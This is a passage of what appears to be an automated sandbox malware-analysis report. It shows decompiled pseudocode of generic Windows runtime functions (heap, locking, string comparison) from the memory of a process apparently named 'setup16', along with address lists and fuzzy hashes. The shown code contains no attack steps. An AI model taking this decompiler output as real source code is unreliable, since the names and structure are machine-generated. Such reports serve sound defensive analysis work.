									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04A09AE0();
								L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L049E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L049E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L049E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L049E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                                                                                                                        0x04a46dd4
                                                                                                                                                                                                        0x04a46dde
                                                                                                                                                                                                        0x04a46de1
                                                                                                                                                                                                        0x04a46de3
                                                                                                                                                                                                        0x04a46de6
                                                                                                                                                                                                        0x04a46de9
                                                                                                                                                                                                        0x04a46dec
                                                                                                                                                                                                        0x04a46def
                                                                                                                                                                                                        0x04a46df2
                                                                                                                                                                                                        0x04a46df5
                                                                                                                                                                                                        0x04a46dfe
                                                                                                                                                                                                        0x04a46e04
                                                                                                                                                                                                        0x04a46e09
                                                                                                                                                                                                        0x04a46e0d
                                                                                                                                                                                                        0x04a46e18
                                                                                                                                                                                                        0x04a46e1b
                                                                                                                                                                                                        0x04a46e22
                                                                                                                                                                                                        0x04a46e2d
                                                                                                                                                                                                        0x04a46e30
                                                                                                                                                                                                        0x04a46e36
                                                                                                                                                                                                        0x04a46e42
                                                                                                                                                                                                        0x04a46e4d
                                                                                                                                                                                                        0x04a46e50
                                                                                                                                                                                                        0x04a46e55
                                                                                                                                                                                                        0x04a46e5c
                                                                                                                                                                                                        0x04a46e6e
                                                                                                                                                                                                        0x04a46e5e
                                                                                                                                                                                                        0x04a46e67
                                                                                                                                                                                                        0x04a46e67
                                                                                                                                                                                                        0x04a46e73
                                                                                                                                                                                                        0x04a46e74
                                                                                                                                                                                                        0x04a46e77
                                                                                                                                                                                                        0x04a46e7c
                                                                                                                                                                                                        0x04a46e7d
                                                                                                                                                                                                        0x04a46e8e
                                                                                                                                                                                                        0x04a46e93
                                                                                                                                                                                                        0x04a46e9c
                                                                                                                                                                                                        0x04a46ea8
                                                                                                                                                                                                        0x04a46eab
                                                                                                                                                                                                        0x04a46eac
                                                                                                                                                                                                        0x04a46eb3
                                                                                                                                                                                                        0x04a46ecd
                                                                                                                                                                                                        0x04a46edc
                                                                                                                                                                                                        0x04a46ee2
                                                                                                                                                                                                        0x04a46ee5
                                                                                                                                                                                                        0x04a46ef2
                                                                                                                                                                                                        0x04a46efb
                                                                                                                                                                                                        0x04a46f01
                                                                                                                                                                                                        0x04a46f06
                                                                                                                                                                                                        0x04a46f0b
                                                                                                                                                                                                        0x04a46f11
                                                                                                                                                                                                        0x04a46f1a
                                                                                                                                                                                                        0x04a46f22
                                                                                                                                                                                                        0x04a46f26
                                                                                                                                                                                                        0x04a46f26
                                                                                                                                                                                                        0x04a46f33
                                                                                                                                                                                                        0x04a46f41
                                                                                                                                                                                                        0x04a46f44
                                                                                                                                                                                                        0x04a46f47
                                                                                                                                                                                                        0x04a46f54
                                                                                                                                                                                                        0x04a46f65
                                                                                                                                                                                                        0x04a46f77
                                                                                                                                                                                                        0x04a46f7c
                                                                                                                                                                                                        0x04a46f82
                                                                                                                                                                                                        0x04a46f91
                                                                                                                                                                                                        0x04a46f99
                                                                                                                                                                                                        0x04a46fa3
                                                                                                                                                                                                        0x04a46fae
                                                                                                                                                                                                        0x04a46fae
                                                                                                                                                                                                        0x04a46fba
                                                                                                                                                                                                        0x04a46fbb
                                                                                                                                                                                                        0x04a46fbc
                                                                                                                                                                                                        0x04a46fc1
                                                                                                                                                                                                        0x04a46fc2
                                                                                                                                                                                                        0x04a46fd3
                                                                                                                                                                                                        0x04a46fd8
                                                                                                                                                                                                        0x04a46fd8
                                                                                                                                                                                                        0x04a46fdf
                                                                                                                                                                                                        0x04a46fe8
                                                                                                                                                                                                        0x04a46fee
                                                                                                                                                                                                        0x04a46fee
                                                                                                                                                                                                        0x04a46ff5
                                                                                                                                                                                                        0x04a46ffb
                                                                                                                                                                                                        0x04a46ffb
                                                                                                                                                                                                        0x04a47004
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a4700a
                                                                                                                                                                                                        0x04a47004
                                                                                                                                                                                                        0x04a46eb3
                                                                                                                                                                                                        0x04a46e9c
                                                                                                                                                                                                        0x04a47015

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                                                                                        • Instruction ID: f1878ea93521fec9864a21864d232ac21fa5b9fec05e1fbacbf15229e4878b9c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC716B71A00209EFDB11DFA5C984EAEBBB9FFC8714F144569E505A7290DB34FA41CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C52A5 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E049C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E049DEEF0(0x4ab79a0);
					_t104 =  *0x4ab8210; // 0xa72bc0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E049DEB70(_t93, 0x4ab79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04A09890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E049DEEF0(0x4ab79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E049DEB70(0, 0x4ab79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xa72bcd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E049FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E049DEEF0(0x4ab79a0);
									__eflags =  *0x4ab8210 - _t104; // 0xa72bc0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4ab8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04A44888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E049DEB70(_t95, 0x4ab79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04A095D0();
											L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04A095D0();
											L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E049DEB70(_t93, 0x4ab79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04A095D0();
										L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04A095D0();
										L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E049FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                                                                                                        0x049c52a5
                                                                                                                                                                                                        0x049c52ad
                                                                                                                                                                                                        0x049c52b0
                                                                                                                                                                                                        0x049c52b3
                                                                                                                                                                                                        0x049c52b7
                                                                                                                                                                                                        0x049c52ba
                                                                                                                                                                                                        0x049c52bf
                                                                                                                                                                                                        0x049c52c4
                                                                                                                                                                                                        0x049c52cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c52ce
                                                                                                                                                                                                        0x049c52d9
                                                                                                                                                                                                        0x049c52dd
                                                                                                                                                                                                        0x049c52e7
                                                                                                                                                                                                        0x049c52f7
                                                                                                                                                                                                        0x049c52f9
                                                                                                                                                                                                        0x049c52fd
                                                                                                                                                                                                        0x04a20dcf
                                                                                                                                                                                                        0x04a20dd5
                                                                                                                                                                                                        0x04a20dd6
                                                                                                                                                                                                        0x04a20dd7
                                                                                                                                                                                                        0x04a20dd8
                                                                                                                                                                                                        0x04a20dd9
                                                                                                                                                                                                        0x04a20dde
                                                                                                                                                                                                        0x04a20ddf
                                                                                                                                                                                                        0x04a20de0
                                                                                                                                                                                                        0x04a20de1
                                                                                                                                                                                                        0x04a20de2
                                                                                                                                                                                                        0x04a20de5
                                                                                                                                                                                                        0x04a20dea
                                                                                                                                                                                                        0x04a20dec
                                                                                                                                                                                                        0x04a20f60
                                                                                                                                                                                                        0x04a20f64
                                                                                                                                                                                                        0x04a20f70
                                                                                                                                                                                                        0x04a20f76
                                                                                                                                                                                                        0x04a20f79
                                                                                                                                                                                                        0x04a20f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20f64
                                                                                                                                                                                                        0x04a20df2
                                                                                                                                                                                                        0x04a20df7
                                                                                                                                                                                                        0x04a20e04
                                                                                                                                                                                                        0x04a20e0d
                                                                                                                                                                                                        0x04a20e0d
                                                                                                                                                                                                        0x04a20e10
                                                                                                                                                                                                        0x04a20e1a
                                                                                                                                                                                                        0x04a20e1c
                                                                                                                                                                                                        0x04a20e4c
                                                                                                                                                                                                        0x04a20e52
                                                                                                                                                                                                        0x04a20e61
                                                                                                                                                                                                        0x04a20e67
                                                                                                                                                                                                        0x04a20e6b
                                                                                                                                                                                                        0x04a20e70
                                                                                                                                                                                                        0x04a20e76
                                                                                                                                                                                                        0x04a20ed7
                                                                                                                                                                                                        0x04a20edc
                                                                                                                                                                                                        0x04a20ee0
                                                                                                                                                                                                        0x04a20ee6
                                                                                                                                                                                                        0x04a20eea
                                                                                                                                                                                                        0x04a20eed
                                                                                                                                                                                                        0x04a20ef0
                                                                                                                                                                                                        0x04a20ef3
                                                                                                                                                                                                        0x04a20ef6
                                                                                                                                                                                                        0x04a20ef9
                                                                                                                                                                                                        0x04a20efe
                                                                                                                                                                                                        0x04a20f01
                                                                                                                                                                                                        0x04a20f01
                                                                                                                                                                                                        0x04a20f0b
                                                                                                                                                                                                        0x04a20f12
                                                                                                                                                                                                        0x04a20f16
                                                                                                                                                                                                        0x04a20f18
                                                                                                                                                                                                        0x04a20f1b
                                                                                                                                                                                                        0x04a20f2c
                                                                                                                                                                                                        0x04a20f31
                                                                                                                                                                                                        0x04a20f31
                                                                                                                                                                                                        0x04a20f35
                                                                                                                                                                                                        0x04a20f39
                                                                                                                                                                                                        0x04a20f3a
                                                                                                                                                                                                        0x04a20f3c
                                                                                                                                                                                                        0x04a20f3f
                                                                                                                                                                                                        0x04a20f50
                                                                                                                                                                                                        0x04a20f55
                                                                                                                                                                                                        0x04a20f55
                                                                                                                                                                                                        0x04a20f59
                                                                                                                                                                                                        0x049c52eb
                                                                                                                                                                                                        0x049c52f1
                                                                                                                                                                                                        0x049c52f1
                                                                                                                                                                                                        0x04a20e7d
                                                                                                                                                                                                        0x04a20e84
                                                                                                                                                                                                        0x04a20e88
                                                                                                                                                                                                        0x04a20e8a
                                                                                                                                                                                                        0x04a20e8d
                                                                                                                                                                                                        0x04a20e9e
                                                                                                                                                                                                        0x04a20ea3
                                                                                                                                                                                                        0x04a20ea3
                                                                                                                                                                                                        0x04a20ea7
                                                                                                                                                                                                        0x04a20eaf
                                                                                                                                                                                                        0x04a20eb3
                                                                                                                                                                                                        0x04a20eb9
                                                                                                                                                                                                        0x04a20eb9
                                                                                                                                                                                                        0x04a20ebc
                                                                                                                                                                                                        0x04a20ecd
                                                                                                                                                                                                        0x04a20ecd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20eb3
                                                                                                                                                                                                        0x04a20e21
                                                                                                                                                                                                        0x04a20e2b
                                                                                                                                                                                                        0x04a20e2f
                                                                                                                                                                                                        0x04a20e30
                                                                                                                                                                                                        0x04a20e3a
                                                                                                                                                                                                        0x04a20e3f
                                                                                                                                                                                                        0x04a20e41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20e47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20e47
                                                                                                                                                                                                        0x04a20df9
                                                                                                                                                                                                        0x04a20dfe
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20dfe
                                                                                                                                                                                                        0x049c5303
                                                                                                                                                                                                        0x049c5307
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c5309
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c5309
                                                                                                                                                                                                        0x049c5307
                                                                                                                                                                                                        0x049c52e9
                                                                                                                                                                                                        0x049c52e9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c52e9
                                                                                                                                                                                                        0x049c530e
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 25e578c116dee7611a75077326cb2d24e7432a769da1fe9ec192461803a499c6
                                                                                                                                                                                                        • Instruction ID: 3bdf901c666048a3844f902b9ce453d00c1c5b82b485a53769c51fb008b8d446
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25e578c116dee7611a75077326cb2d24e7432a769da1fe9ec192461803a499c6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5514170205751AFE721EF28C940B27BBE8FF84724F00882EE59587691E7B4F804DB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F2AE4 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4ab8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4ab8208; // 0x4ab8207
				_t8 = _t57 + 0x4ab8208; // 0x4ab8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4ab8450; // 0xa79b54
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4ab821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4ab6d5c; // 0x7fb60654
							_t72 =  *0x4ab6d5c; // 0x7fb60654
							_t75 =  *0x4ab6d5c; // 0x7fb60654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4ab6d5c; // 0x7fb60654
							_t84 =  *0x4ab6d5c; // 0x7fb60654
							_t87 =  *0x4ab6d5c; // 0x7fb60654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04A0F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                                                                                                                        0x049f2ae4
                                                                                                                                                                                                        0x049f2aec
                                                                                                                                                                                                        0x049f2aef
                                                                                                                                                                                                        0x049f2af4
                                                                                                                                                                                                        0x049f2af7
                                                                                                                                                                                                        0x049f2afd
                                                                                                                                                                                                        0x049f2b92
                                                                                                                                                                                                        0x049f2b92
                                                                                                                                                                                                        0x049f2b97
                                                                                                                                                                                                        0x049f2b9c
                                                                                                                                                                                                        0x049f2b9c
                                                                                                                                                                                                        0x049f2b03
                                                                                                                                                                                                        0x049f2b06
                                                                                                                                                                                                        0x049f2b09
                                                                                                                                                                                                        0x049f2b09
                                                                                                                                                                                                        0x049f2b0f
                                                                                                                                                                                                        0x049f2b15
                                                                                                                                                                                                        0x049f2b15
                                                                                                                                                                                                        0x049f2b1b
                                                                                                                                                                                                        0x049f2b1e
                                                                                                                                                                                                        0x049f2b21
                                                                                                                                                                                                        0x049f2b26
                                                                                                                                                                                                        0x049f2b29
                                                                                                                                                                                                        0x049f2b81
                                                                                                                                                                                                        0x049f2b84
                                                                                                                                                                                                        0x049f2c0e
                                                                                                                                                                                                        0x049f2c15
                                                                                                                                                                                                        0x049f2c24
                                                                                                                                                                                                        0x049f2c24
                                                                                                                                                                                                        0x049f2b8a
                                                                                                                                                                                                        0x049f2b8a
                                                                                                                                                                                                        0x049f2b8a
                                                                                                                                                                                                        0x049f2b8a
                                                                                                                                                                                                        0x049f2b90
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2b4a
                                                                                                                                                                                                        0x049f2b4a
                                                                                                                                                                                                        0x049f2b4d
                                                                                                                                                                                                        0x049f2b53
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2b55
                                                                                                                                                                                                        0x049f2b58
                                                                                                                                                                                                        0x049f2bb7
                                                                                                                                                                                                        0x04a35d1b
                                                                                                                                                                                                        0x04a35d37
                                                                                                                                                                                                        0x04a35d47
                                                                                                                                                                                                        0x04a35d53
                                                                                                                                                                                                        0x049f2bbd
                                                                                                                                                                                                        0x049f2bbd
                                                                                                                                                                                                        0x049f2bbd
                                                                                                                                                                                                        0x049f2bb7
                                                                                                                                                                                                        0x049f2b5d
                                                                                                                                                                                                        0x049f2c2f
                                                                                                                                                                                                        0x04a35d5b
                                                                                                                                                                                                        0x04a35d77
                                                                                                                                                                                                        0x04a35d87
                                                                                                                                                                                                        0x04a35d93
                                                                                                                                                                                                        0x049f2c35
                                                                                                                                                                                                        0x049f2c35
                                                                                                                                                                                                        0x049f2c35
                                                                                                                                                                                                        0x049f2c2f
                                                                                                                                                                                                        0x049f2b65
                                                                                                                                                                                                        0x049f2b9f
                                                                                                                                                                                                        0x049f2ba2
                                                                                                                                                                                                        0x049f2b67
                                                                                                                                                                                                        0x049f2b67
                                                                                                                                                                                                        0x049f2b69
                                                                                                                                                                                                        0x049f2b6b
                                                                                                                                                                                                        0x049f2b6e
                                                                                                                                                                                                        0x049f2bc9
                                                                                                                                                                                                        0x049f2bcc
                                                                                                                                                                                                        0x049f2bcf
                                                                                                                                                                                                        0x049f2bd4
                                                                                                                                                                                                        0x049f2bd6
                                                                                                                                                                                                        0x049f2bd6
                                                                                                                                                                                                        0x049f2bdb
                                                                                                                                                                                                        0x049f2c02
                                                                                                                                                                                                        0x049f2c05
                                                                                                                                                                                                        0x049f2c07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2c07
                                                                                                                                                                                                        0x049f2be0
                                                                                                                                                                                                        0x049f2c00
                                                                                                                                                                                                        0x049f2c3f
                                                                                                                                                                                                        0x049f2c3f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2c00
                                                                                                                                                                                                        0x049f2be5
                                                                                                                                                                                                        0x049f2be7
                                                                                                                                                                                                        0x049f2bec
                                                                                                                                                                                                        0x049f2bf4
                                                                                                                                                                                                        0x049f2bf6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2bf6
                                                                                                                                                                                                        0x049f2b70
                                                                                                                                                                                                        0x049f2b76
                                                                                                                                                                                                        0x049f2b2b
                                                                                                                                                                                                        0x049f2b2b
                                                                                                                                                                                                        0x049f2b2d
                                                                                                                                                                                                        0x049f2b2f
                                                                                                                                                                                                        0x049f2b32
                                                                                                                                                                                                        0x049f2b35
                                                                                                                                                                                                        0x049f2b3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2b40
                                                                                                                                                                                                        0x049f2b43
                                                                                                                                                                                                        0x049f2b45
                                                                                                                                                                                                        0x049f2b47
                                                                                                                                                                                                        0x049f2b4a
                                                                                                                                                                                                        0x049f2b4d
                                                                                                                                                                                                        0x049f2b53
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2b53
                                                                                                                                                                                                        0x049f2b78
                                                                                                                                                                                                        0x049f2b78
                                                                                                                                                                                                        0x049f2b7b
                                                                                                                                                                                                        0x049f2b7e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2b7e
                                                                                                                                                                                                        0x049f2b76
                                                                                                                                                                                                        0x049f2ba5
                                                                                                                                                                                                        0x049f2ba5
                                                                                                                                                                                                        0x049f2ba8
                                                                                                                                                                                                        0x049f2bad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f2baf
                                                                                                                                                                                                        0x049f2baf
                                                                                                                                                                                                        0x049f2bc2
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: bccd8fc016d75f55600d171729eec1481b775232cbd58a6ba8f6f7f8f8ff529b
                                                                                                                                                                                                        • Instruction ID: c21f9b14d6951ec91e9f599863f09a7f9eb85e1b342cbc2b10a0873a32e04948
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bccd8fc016d75f55600d171729eec1481b775232cbd58a6ba8f6f7f8f8ff529b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8251E276B101158FCB18CF0CC880ABDB7B2FB8970171588AAED569B325E735BE41CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A8AE44 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
